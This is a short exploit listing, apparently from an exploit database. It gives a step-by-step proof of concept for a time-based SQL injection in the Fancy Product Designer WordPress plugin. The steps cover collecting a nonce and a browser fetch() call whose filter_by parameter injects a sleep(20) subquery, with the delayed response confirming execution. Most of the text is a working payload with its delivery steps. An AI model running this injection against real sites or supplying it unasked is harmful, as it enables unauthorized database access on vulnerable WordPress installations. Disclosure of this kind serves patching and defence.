Share
## https://sploitus.com/exploit?id=WPEX-ID:4B8B9638-D52A-40BC-B298-AE1C74788C18
- Log in as an administrator, and visit /wp-admin/.
- Add a Catalog Product in /wp-admin/admin.php?page=fancy_product_designer
- Search for "fpd_dismiss_notification" in the page's source, note down the associated nonce
- Send the following fetch() command in your browser's console, and replace $NONCE with the nonce:

```
fetch('/wp-admin/admin-ajax.php?action=fpd_get_products&_ajax_nonce=$NONCE&filter_by=ID%2c(select*from(select(sleep(20)))a)&sort_by=ASC&page=1&type=catalog').then(x=>x.text()).then(x=>console.log(x)) 
```

Notice it takes approximately 20 seconds for the server to answer, confirming our injected SQL statements were executed.